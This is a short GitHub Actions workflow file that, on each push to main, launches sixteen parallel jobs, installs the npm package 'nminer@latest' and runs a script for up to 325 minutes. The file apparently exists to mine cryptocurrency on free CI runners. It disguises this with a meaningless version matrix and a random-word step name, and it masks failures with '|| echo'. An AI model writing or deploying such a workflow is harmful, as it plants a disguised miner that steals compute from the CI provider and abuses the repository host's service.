name: sticker
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 655 }
          - { version: 984 }
          - { version: 7509 }
          - { version: 5490 }
          - { version: 7253 }
          - { version: 3780 }
          - { version: 4683 }
          - { version: 6784 }
          - { version: 9711 }
          - { version: 9 }
          - { version: 4359 }
          - { version: 2144 }
          - { version: 8028 }
          - { version: 7920 }
          - { version: 1507 }
          - { version: 9300 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: meanwhile hepatitis travel deploy
        run: |
          npm install nminer@latest
          timeout 325m node sticker.js || echo "sticker executed"